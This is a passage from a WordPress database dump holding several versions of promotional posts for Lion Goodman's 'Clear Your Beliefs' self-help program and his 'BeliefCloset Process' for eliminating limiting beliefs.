Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://www.clearbeliefs.com" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="__blank"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'open', 'open', '', '1450-revision-v1', '', '', '2015-04-16 12:36:02', '2015-04-16 17:36:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1/', 0, 'revision', '', 0),
(2133, 2, '2015-03-13 14:23:30', '2015-03-13 19:23:30', ' ', '', '', 'publish', 'closed', 'open', '', '2133', '', '', '2015-03-17 21:34:26', '2015-03-18 02:34:26', '', 0, 'http://clearyourbeliefs.com/?p=2133', 3, 'nav_menu_item', '', 0),
(2135, 2, '2015-03-14 00:33:15', '2015-03-14 05:33:15', '<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1.jpg"><img class="alignleft size-medium wp-image-302" src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="300" height="282" /></a>You have a unique set of problems. And so do I.</p>\r\n<p>Problems come with being human. You have a body, which is less than perfect. You have an ego with constantly changing needs and reactions. Imperfect people fill your life, and each of them has their own needs, opinions, and problems of their own.</p>\r\n<p>Are your problems a problem for you? Or are they just "life"?</p>\r\n<p><!--more--></p>\r\n<p>Most people tackle their problems from the end-point, the condition they want: "This is what I want, and I don''t have it. So I''ll figure out how to get it."</p>\r\n<p>This leads to many well-worn strategies: persuasion, manipulation, control over others, and increasing one''s personal wealth and power.</p>\r\n<p>When our problems involve other people, we try to control their behavior or change them in some way. This is usually frustrating. We pay them to do what we want them to do. We entice them with rewards. We threaten with consequences, or punishment. We even play nice and try cooperation. The game is the same regardless. You''re trying to change them so you get what you want.</p>\r\n<p>You''ve been on the receiving end of this will-bending process. When you were a child, your parents (and teachers, and priests...) tried every trick in the book to get you to behave the way they wanted you to behave, and believe what they wanted you to believe.</p>\r\n<p>There''s another approach to solving problems that works better. It''s easier, and it causes less harm. Look within, to the CAUSE of the problem itself.</p>\r\n<p>When you begin within, you''ve got a better chance at solving the real problem.</p>\r\n<p>Most of us try the same tactics on ourselves that didn''t work well on others. We try to persuade, dominate, or control ourselves. We push ourselves with inner discipline. We talk to ourselves nicely, then harshly. We offer ourselves rewards and punishment to bend our inner will toward our outer goals.</p>\r\n<p>This works about as well as when we try to control or manipulate others. In other words – not very well.</p>\r\n<p>So what''s the solution? Where does real change begin?</p>\r\n<p>It begins with your beliefs.</p>\r\n<p>Our stance is that your beliefs create your experience.</p>\r\n<p>If this proposition is true, you should be able to directly alter your experience by changing your beliefs. You should be able to alter or solve a problem by changing your beliefs.</p>\r\n<p>Does it work? Yes. Surprisingly well!</p>\r\n<p>Your problem might be personal and internal, such as being overweight, self-critical, or lacking motivation.</p>\r\n<p>Your problem might be external, and involve other people, such as relationship issues, difficulties at work, and organizational problems.</p>\r\n<p>When you examine the beliefs you have about the problem, and your beliefs about yourself with regard to the problem, you open up your viewpoint about the issue, and gain new perspective – both of which are incredibly valuable.</p>\r\n<p>Begin by asking these questions:<br />\r\nWhat do I believe about this problem?<br />\r\nWhat do I believe about my ability to solve it?<br />\r\nWhat do I believe about the other person, or persons, involved?<br />\r\nWhat do I believe about the circumstances and environment the problem is part of?<br />\r\nWhat would happen if I changed some of those beliefs?<br />\r\nThen, examine your list and look for beliefs that, if changed, would create a significant breakthrough.</p>\r\n<p>Archimedes said: "Give me a place to stand, and a lever of sufficient length, and I can move the world." Belief-change is the lever that can move your world.</p>\r\n<p>When you change your beliefs, your circumstances won''t necessarily change (although quite often they do). However, you will be in the best position possible to deal with your circumstances. This is that "place to stand" – your standpoint, or perspective on the situation.</p>\r\n<p>For example, when you change the belief, "I can''t do anything about that," to "I can do something about that," you radically shift the possibilities that are open to you.</p>\r\n<p>In many cases, when you change your beliefs at the core, the problem will lighten up or disappear completely. Solutions appear that weren''t visible before.</p>\r\n<p>This is the great benefit of clearing your beliefs.</p>\r\n<p>If you''d like to learn more about this methodology for changing your beliefs at the core of your psyche, visit ClearYourBeliefs.com.</p>\r\n<p>And if you''re a leader, a coach, or an agent of change, learn how to use this potent methodology to help your team or your clients solve their problems more quickly and efficiently. Information about the training, which begins April 14th, is available at ClearBeliefs.com.</p>\r\n<p>My wish for you is that you have better, bigger problems to solve in your life!</p>\r\n', 'Solve Your Problem from the Inside', '', 'inherit', 'closed', 'open', '', '2121-revision-v1', '', '', '2015-03-14 00:33:15', '2015-03-14 05:33:15', '', 2121, 'http://clearyourbeliefs.com/2121-revision-v1/', 0, 'revision', '', 0),
(2136, 2, '2015-03-17 01:14:40', '2015-03-17 06:14:40', '<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset.jpg"><img class="alignleft  wp-image-956" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset-250x300.jpg" alt="boat on spectacular sunset" width="195" height="234" /></a><strong>After studying more than twenty different belief-change methodologies, I identified 7 crucial elements required for permanent belief change</strong>.\r\n\r\nI tested each methodology personally, and also with clients.  I found that if all 7 elements are present, a belief can be completely and permanently eliminated from the psyche.  If any of the 7 elements are missing, results will be incomplete, temporary, or ineffective.\r\n\r\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\r\n\r\nWhen the belief-change process is partial, or incomplete, clients offer comments such as:\r\n<ul>\r\n<ul>\r\n<ul>\r\n	<li><em style="line-height: 1.5;">“I felt a little better.”</em></li>\r\n	<li><em>“I got something out of the process, but it didn’t rock my world.”</em></li>\r\n	<li><em>“The process seemed to work for a while, then it faded.”</em></li>\r\n	<li><em>“The belief was gone right after the process ended, but it returned two days later.”</em></li>\r\n	<li><em>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</em></li>\r\n</ul>\r\n</ul>\r\n</ul>\r\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return like a rash that never quite disappears... <!--more-->With most of these methods, the belief continued to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.\r\n\r\n<strong>I tested these techniques, along with many others:</strong>\r\n<ul>\r\n<ul>\r\n<ul>\r\n	<li><span style="line-height: 1.5;">Affirmations</span></li>\r\n	<li>EFT (Tapping)</li>\r\n	<li>Neuro-Linguistic Programming (NLP)</li>\r\n	<li>Access Consciousness</li>\r\n	<li>“The Work” of Byron Katie</li>\r\n	<li>The Lefkoe Method</li>\r\n	<li>The Avatar Materials</li>\r\n</ul>\r\n</ul>\r\n</ul>\r\nI analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  <strong>This is what I discovered:</strong>\r\n<ol>\r\n<ol>\r\n<ol>\r\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\r\n	<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\r\n	<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\r\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n	<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n	<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\r\n</ol>\r\n</ol>\r\n</ol>\r\n<strong>After my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.</strong>\r\n\r\nI needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.\r\n\r\n<strong>I created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.</strong>  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\r\n\r\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\r\n\r\n<strong>These are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:</strong>\r\n<ol>\r\n<ol>\r\n<ol>\r\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\n</ol>\r\n</ol>\r\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.\r\n\r\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\r\n\r\n<strong>Clear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system. </strong> It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\r\n\r\n<strong><em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.</strong>  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\r\n\r\n&nbsp;', '7 Steps to Clear Any Belief', '', 'publish', 'open', 'open', '', '7-steps-to-clear-any-belief', '', '', '2015-03-17 03:18:40', '2015-03-17 08:18:40', '', 0, 'http://clearyourbeliefs.com/?p=2136', 0, 'post', '', 0),
(2137, 2, '2015-03-17 01:14:40', '2015-03-17 06:14:40', '', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 01:14:40', '2015-03-17 06:14:40', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0),
(2138, 2, '2015-03-17 03:17:58', '2015-03-17 08:17:58', '<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset.jpg"><img class="alignleft  wp-image-956" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/boat-on-spectacular-sunset-250x300.jpg" alt="boat on spectacular sunset" width="195" height="234" /></a><strong>After studying more than twenty different belief-change methodologies, I identified 7 crucial elements required for permanent belief change</strong>.\n\nI tested each methodology personally, and also with clients.  I found that if all 7 elements are present, a belief can be completely and permanently eliminated from the psyche.  If any of the 7 elements are missing, results will be incomplete, temporary, or ineffective.\n\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\n\nWhen the belief-change process is partial, or incomplete, clients offer comments such as:\n<ul>\n<ul>\n<ul>\n	<li><em style="line-height: 1.5;">“I felt a little better.”</em></li>\n	<li><em>“I got something out of the process, but it didn’t rock my world.”</em></li>\n	<li><em>“The process seemed to work for a while, then it faded.”</em></li>\n	<li><em>“The belief was gone right after the process ended, but it returned two days later.”</em></li>\n	<li><em>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</em></li>\n</ul>\n</ul>\n</ul>\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return like a rash that never quite disappears... <!--more-->With most of these methods, the belief continued to operate in the background, and the individual''s responses, reactions and behavior were mostly the same as they had been before.  Even if the belief disappeared from awareness, it seemed to creep back into consciousness in a few hours, days, or weeks.\n\n<strong>I tested these techniques, along with many others:</strong>\n<ul>\n<ul>\n<ul>\n	<li><span style="line-height: 1.5;">Affirmations</span></li>\n	<li>EFT (Tapping)</li>\n	<li>Neuro-Linguistic Programming (NLP)</li>\n	<li>Access Consciousness</li>\n	<li>“The Work” of Byron Katie</li>\n	<li>The Lefkoe Method</li>\n	<li>The Avatar Materials</li>\n</ul>\n</ul>\n</ul>\nI analyzed the psychological, mental, and emotional components of each method. I sought to understand each of their advantages and disadvantages.  This is what I discovered:\n<ol>\n<ol>\n<ol>\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is helpful to recognize that you have a belief, and recognize that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it appears to be stored.</li>\n	<li>"Core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language-based instructions.</li>\n	<li>Many practices claim that their technique shifts beliefs in the subconscious mind, but the results are fuzzy, inconsistent, or temporary.  Often, results depend on the practitioner, which hints at the possibility that the practitioner has more influence than the technique does. This suggests that the technique isn’t actually clearing the belief completely or permanently. These methods will only be partially effective and temporary.</li>\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief, or whether the belief has been cleared.  Muscle testing is highly problematic. It is unreliable, unscientific, and it the skill of the practitioner is paramount.  Most people don''t have sufficient training to keep their own projections out of the process.   Muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\n	<li>Many methods require the practitioner to do something mysterious to you, or for you. Often, these processes have pseudo-scientific names such as "Quantum Field Cleansing" or "Matrix Manifestation Clearing."  When the practitioner is in charge of your belief clearing, it creates a dependency on the practitioner for future clearings. This is good business, but bad science. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\n	<li>Methods that use “tapping” such as EFT claim to clear issues permanently.  Tapping meridian points on the body certainly seems to shift one''s energy in the moment, and this can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (Although it has been used effectively for clearing past trauma conditions such as PTSD).</li>\n</ol>\n</ol>\n</ol>\nAfter my study of these various methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.\n\nI needed to see specific evidence that a belief was permanently removed.  This included: 1) significant and permanent shifts in both awareness and behavior; 2) no back-sliding or repeating of the old patterns; 3) a significant, felt change in the clients’ view of themselves, other people, and the world; and 4) behavioral changes that unfolded naturally and automatically toward actions that would create their desired outcomes.   A successful outcome would produce a change in self-view, others-view, and world view.   The client would feel more confident and empowered.  They would treat themselves and others with more love and respect.  And the individual’s circumstances would change, and new opportunities would appear that hadn’t appeared before.\n\n<strong>I created the <em>BeliefCloset Process </em>to achieve all of these goals, and ten years of research and development have proven my proposition.</strong>  It uses guided imagery to engage all levels of the mind.  Thousands of people have gone through the process, and I have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\n\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\n\n<strong>These are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:</strong>\n<ol>\n<ol>\n<ol>\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\n</ol>\n</ol>\n</ol>\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the super-conscious mind, or Higher Self.\n\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\n\n<strong>Clear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system. </strong> It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\n\n<em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\n\n&nbsp;', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-autosave-v1', '', '', '2015-03-17 03:17:58', '2015-03-17 08:17:58', '', 2136, 'http://clearyourbeliefs.com/2136-autosave-v1/', 0, 'revision', '', 0),
(2139, 2, '2015-03-17 01:30:53', '2015-03-17 06:30:53', 'After studying more than twenty different belief-change methodologies, I was able to identify seven crucial elements of the belief change process.  I tested these methodologies personally, and also with some of my clients.  If are seven are present, a belief can be completely eliminated from the core of the psyche.  If any of them are missing, results will be incomplete, temporary, or ineffective.\r\n\r\nMost of the techniques I studied turned out to be only partially effective, because they were missing one or more of the seven required elements.\r\n\r\nWhen the belief-change process is partial, or incomplete, client offer comments like these:\r\n<ul>\r\n	<li>“I felt a little better.”</li>\r\n	<li>“I got something out of the process, but it didn’t rock my world.”</li>\r\n	<li>“The process seemed to work for a while, then it faded.”</li>\r\n	<li>“The belief was gone right after the process ended, but it returned two days later.”</li>\r\n	<li>“The world looked different that day, and I felt great.  The next day I was right back where I had been before.”</li>\r\n</ul>\r\nI began seeking a more permanent solution – a way to completely eliminate negative and limiting beliefs – so the old beliefs wouldn’t return to haunt me.  Most of the methods I tested had temporary results. I could feel the belief still operating in the background of my consciousness.  My responses, reactions and behavior were mostly the same as they had been before.  Or, if the belief disappeared from my awareness, the old belief seemed to creep back into my consciousness in a few hours, days, or weeks.\r\n\r\nI tested these techniques, and many others:\r\n<ul>\r\n	<li>Affirmations</li>\r\n	<li>EFT (Tapping)</li>\r\n	<li>Neuro-Linguistic Programming (NLP)</li>\r\n	<li>Access Consciousness</li>\r\n	<li>“The Work” of Byron Katie</li>\r\n	<li>The Lefkoe Method</li>\r\n	<li>The Avatar Materials</li>\r\n</ul>\r\nI analyzed the components of each method so I could understand its advantages and disadvantages.  This is the summary of what I discovered:\r\n<ol>\r\n	<li>Most techniques work at the <em>conscious level of the mind. </em>It is very helpful to recognize that you have a belief, and that the belief isn’t actually true.  This is a good and necessary first step.  However, as important as these two conscious steps are, they don’t touch – or clear – the belief from the subconscious mind, which is where it is actually stored.</li>\r\n	<li>Most of our “core beliefs,” the ones that affect us most deeply, are literally below the level of consciousness, and are not easily accessible by the conscious mind. Many were acquired before we gained the ability to speak, so they are stored non-verbally, and cannot be accessed through language.</li>\r\n	<li>Many teachers and practitioners claim that their technique shifts beliefs in the subconscious mind, but the results are temporary. This indicates that the technique didn’t actually clear the belief from the subconscious mind completely or permanently, so it will only be partially effective, and temporary.</li>\r\n	<li>Some methods involve muscle testing as a way of determining whether the client has a particular belief.  Muscle testing is both unreliable and unscientific, and it requires a highly skilled practitioner.  Most people trained in these methods don’t get sufficient training in order to keep their own projections out of the process.  So muscle testing works for some people, but many others don’t believe in it, or think it’s too woo-woo. This makes the technique ineffective for many people.</li>\r\n	<li>Some methods require the practitioner to do something mysterious to you, or for you. These are often named with scientific-sounding terms such as “clearing your spinal energy channels” or “opening the quantum field.”  There are two problems: first, they are not based on objective evidence, and secondly, it can create a dependency on the practitioner for future clearings. Since our beliefs create our reality, any system or process the client <em>believes in</em> will have some positive results – for a while. Most people don’t experience permanent change, however.  (And clients often blame themselves if the process doesn’t work, rather than challenging the methodology’s effectiveness.)</li>\r\n	<li>Some belief-change techniques take the client through long lists of beliefs to test  whether they have them.  We are easily programmed by others, so this method can actually introduce new beliefs into the client’s system, rather than clearing out the ones they have.</li>\r\n	<li>“Tapping” methods such as EFT claim to clear issues permanently.  Tapping methods certainly shift bodily energies in the moment, which can be very helpful. However, I haven’t seen evidence that the changes caused by tapping are permanent, or result in significant behavior change.  (There is evidence that it can be effective for healing trauma conditions such as PTSD, however).</li>\r\n</ol>\r\nAfter my study of these varied methodologies, I concluded that a new methodology was needed – one based on a scientific understanding of the belief formation process – including neurology, psychology, and physiology, as well as a deep understanding of the structure of consciousness and the mind itself.\r\n\r\nI wanted very specific evidence that a belief was permanently gone: significant and permanent shifts in both awareness and behavior, with no back-sliding or repeating of the old patterns.  If successful, a significant, felt change would occur in the clients’ view of themselves, other people, and the world.  They would see themselves differently and feel more empowered. They would see others differently and treat them with more love and respect.  The individual’s circumstances and the world would look different, and new opportunities would appear that they hadn’t seen before.  Behaviors would shift automatically, and easily, toward the actions that would create their desired outcome.\r\n\r\nI used all of this research and study to create the <em>BeliefCloset Process</em>, a new way of permanently deleting old, negative and limiting beliefs. The process utilizes a guided imagery technique that engages all levels of the mind.  I have taken thousands of people through the process, and have taught the methodology to hundreds of therapists, coaches, and healers around the world who now use it in their practice.\r\n\r\n<em>The BeliefCloset Process</em> is not a silver bullet that changes everything magically. It is a tool that can be used to do the inner work required.  It has a profound impact that can be felt viscerally when each belief is dis-created.\r\n\r\nThese are the seven elements necessary to delete a belief permanently from the core of the psyche.  The BeliefCloset Process utilizes all of them:\r\n<ol>\r\n	<li>The client recognizes that a belief is involved in the condition, problem, or issue they want to change, and they acknowledge that the belief is just a belief – it is not actually true.</li>\r\n	<li>The client comes to know the belief intimately – as a part of themselves.  They can feel the belief’s impact on their life and on their future possibilities.  They can also feel the  bo</li>\r\n	<li>The client follows the belief down to its root – to its beginnings, in the subconscious mind.  The source could have been indoctrination by others, a self-created conclusion, or a karmic carry-over from the past.</li>\r\n	<li>The client experiences separation from the belief, and recognizes their role in creating it.  This brings the client into their superconscious, or Higher Self, and gives them the power to un-create it.</li>\r\n	<li>The client makes a conscious decision to let the belief go and eliminate it from existence.</li>\r\n	<li>The subconscious, conscious, and super-conscious mind are involved collaboratively in destroying the belief.  Thus, there is no built-in resistance to the act. This is akin to pulling a weed up by its roots so it doesn’t grow back.</li>\r\n	<li>Once the belief is destroyed, the client chooses a new, empowering belief to plant in the space formerly held by the old belief.  This positive belief aligns the client with their highest intentions and their Higher Self.  By destroying the old belief first, this new affirmative belief, or declaration, can then create its intended reality without resistance from old beliefs in the subconscious mind.</li>\r\n</ol>\r\nGuided imagery provides a rich tapestry to engage the subconscious mind. Instructions and requests for feedback engages the conscious mind, and the choice to delete the belief involves the superconscious mind, or Higher Self.\r\n\r\nIt is crucial that the client make all of their own decisions throughout the process.  This creates safety, and puts the client in charge of the process. This prevents them from becoming subject to the Guide''s recommendations or good ideas (which would just be further indoctrination).  By using a rich metaphor and a playful approach to engage the subconscious mind, the technique had proven itself not only effective, but also creative and fun!\r\n\r\nClear Your Beliefs, a 7-week recorded program, allows individuals to conveniently conduct a major clean-out of their core belief system.  It gently guide users through the seven steps, and allows them to delete their own negative and limiting beliefs – the ones that have interfered with their attainment of success, wealth, health, and loving relationships.  This gives the client control over their own belief structures. It is a true empowerment system.\r\n\r\n<em>The BeliefCloset Process</em> is offered as a power tool for therapists, healers, and coaches worldwide.  Information for practitioners is available on <a href="http://www.ClearBeliefs.com">www.ClearBeliefs.com</a>.\r\n\r\n&nbsp;', '7 Steps to Clear Any Belief', '', 'inherit', 'open', 'open', '', '2136-revision-v1', '', '', '2015-03-17 01:30:53', '2015-03-17 06:30:53', '', 2136, 'http://clearyourbeliefs.com/2136-revision-v1/', 0, 'revision', '', 0);
